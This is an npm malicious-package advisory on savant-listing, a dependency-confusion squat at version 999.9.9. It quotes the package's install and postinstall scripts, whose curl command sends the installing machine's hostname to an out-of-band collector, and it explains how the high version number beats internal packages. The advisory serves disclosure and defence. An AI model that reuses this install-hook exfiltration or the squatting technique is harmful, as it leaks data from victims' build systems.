VYPR

npm · Malicious package advisory

Malware

savant-listing

MAL-2026-5401

Malicious code in savant-listing (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461)
savant-listing@999.9.9 is a dependency-confusion squat. package.json declares both `install` and `postinstall` lifecycle scripts that run `curl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname)`, unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on every `npm install`. The version `999.9.9` and description `SAFE PoC - Demonstrates dependency confusion` are consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction.

Compromised versions (2)

  • 999.9.10
  • 999.9.9

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.